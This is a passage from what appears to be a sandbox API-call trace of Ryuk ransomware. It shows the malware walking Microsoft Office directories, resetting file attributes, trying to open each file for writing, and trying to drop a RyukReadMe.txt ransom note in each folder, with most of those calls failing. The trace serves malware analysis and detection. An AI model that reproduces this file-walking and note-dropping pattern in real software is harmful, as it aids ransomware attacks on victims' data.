lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.082] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.082] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.082] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.082] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.082] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\bg_OliveGreen.gif", dwFileAttributes=0x80) returned 0 [0136.082] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\bg_OliveGreen.gif" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\bg_olivegreen.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.082] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.082] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.082] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.082] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.083] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\bg_Premium.gif", dwFileAttributes=0x80) returned 0 [0136.083] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\bg_Premium.gif" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\bg_premium.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.083] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.083] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.083] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.083] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.083] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\bg_SlateBlue.gif", dwFileAttributes=0x80) returned 0 [0136.086] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\bg_SlateBlue.gif" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\bg_slateblue.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.086] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.086] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.086] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.086] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.086] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\bg_TexturedBlue.gif", dwFileAttributes=0x80) returned 0 [0136.087] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\bg_TexturedBlue.gif" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\bg_texturedblue.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.087] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.087] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.087] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.087] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.087] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\bg_VelvetRose.gif", dwFileAttributes=0x80) returned 0 [0136.087] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\bg_VelvetRose.gif" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\bg_velvetrose.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.087] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.087] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.087] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.087] SetLastError (dwErrCode=0x0) [0136.087] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.088] GetLastError () returned 0x5 [0136.088] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0136.088] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.088] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3bb540 [0136.089] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.090] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.090] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.091] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Adobe.css", dwFileAttributes=0x80) returned 0 [0136.091] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Adobe.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\adobe.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.091] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.091] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.091] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.091] SetLastError (dwErrCode=0x0) [0136.091] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.091] GetLastError () returned 0x5 [0136.091] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0136.091] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.091] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Americana\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3b4940 [0136.091] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.091] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.091] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.092] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Americana\\TAB_OFF.GIF", dwFileAttributes=0x80) returned 0 [0136.092] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Americana\\TAB_OFF.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\americana\\tab_off.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.092] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.092] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.092] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.092] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.092] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Americana\\TAB_ON.GIF", dwFileAttributes=0x80) returned 0 [0136.093] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Americana\\TAB_ON.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\americana\\tab_on.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.093] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.093] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.093] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0136.093] FindClose (in: hFindFile=0x3b4940 | out: hFindFile=0x3b4940) returned 1 [0136.093] SetLastError (dwErrCode=0x0) [0136.093] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Americana\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\americana\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.093] GetLastError () returned 0x5 [0136.093] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0136.094] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.094] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.094] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.094] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Americana.css", dwFileAttributes=0x80) returned 0 [0136.094] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Americana.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\americana.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.094] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.094] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.094] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.094] SetLastError (dwErrCode=0x0) [0136.094] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.094] GetLastError () returned 0x5 [0136.094] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0136.094] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.094] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BabyBlue\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3b4940 [0136.095] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.095] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.095] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.095] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BabyBlue\\BUTTON.GIF", dwFileAttributes=0x80) returned 0 [0136.095] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BabyBlue\\BUTTON.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\babyblue\\button.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.096] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.096] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.096] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.096] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.096] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BabyBlue\\HEADER.GIF", dwFileAttributes=0x80) returned 0 [0136.096] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BabyBlue\\HEADER.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\babyblue\\header.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.096] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.096] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.096] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.096] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.096] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BabyBlue\\TAB_OFF.GIF", dwFileAttributes=0x80) returned 0 [0136.097] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BabyBlue\\TAB_OFF.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\babyblue\\tab_off.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.097] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.097] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.097] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.097] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.098] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BabyBlue\\TAB_ON.GIF", dwFileAttributes=0x80) returned 0 [0136.098] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BabyBlue\\TAB_ON.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\babyblue\\tab_on.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.098] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.098] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.098] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0136.098] FindClose (in: hFindFile=0x3b4940 | out: hFindFile=0x3b4940) returned 1 [0136.098] SetLastError (dwErrCode=0x0) [0136.098] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BabyBlue\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\babyblue\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.098] GetLastError () returned 0x5 [0136.098] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0136.098] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.098] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.098] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.098] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BabyBlue.css", dwFileAttributes=0x80) returned 0 [0136.099] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BabyBlue.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\babyblue.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.099] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.099] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.099] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.099] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.099] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Beige.css", dwFileAttributes=0x80) returned 0 [0136.099] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Beige.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\beige.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.099] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.099] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.099] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.100] SetLastError (dwErrCode=0x0) [0136.100] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.100] GetLastError () returned 0x5 [0136.100] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0136.100] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.100] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Biscay\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3b4940 [0136.100] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.100] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.100] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.100] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Biscay\\TAB_OFF.GIF", dwFileAttributes=0x80) returned 0 [0136.100] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Biscay\\TAB_OFF.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\biscay\\tab_off.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.100] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.100] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.101] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.101] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.101] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Biscay\\TAB_ON.GIF", dwFileAttributes=0x80) returned 0 [0136.101] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Biscay\\TAB_ON.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\biscay\\tab_on.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.101] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.101] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.101] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0136.101] FindClose (in: hFindFile=0x3b4940 | out: hFindFile=0x3b4940) returned 1 [0136.101] SetLastError (dwErrCode=0x0) [0136.101] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Biscay\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\biscay\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.101] GetLastError () returned 0x5 [0136.101] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0136.101] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.101] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.101] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.102] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Biscay.css", dwFileAttributes=0x80) returned 0 [0136.102] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Biscay.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\biscay.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.102] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.102] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.102] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.102] SetLastError (dwErrCode=0x0) [0136.102] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.102] GetLastError () returned 0x5 [0136.102] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0136.102] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.102] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BrightOrange\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3b4940 [0136.103] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) 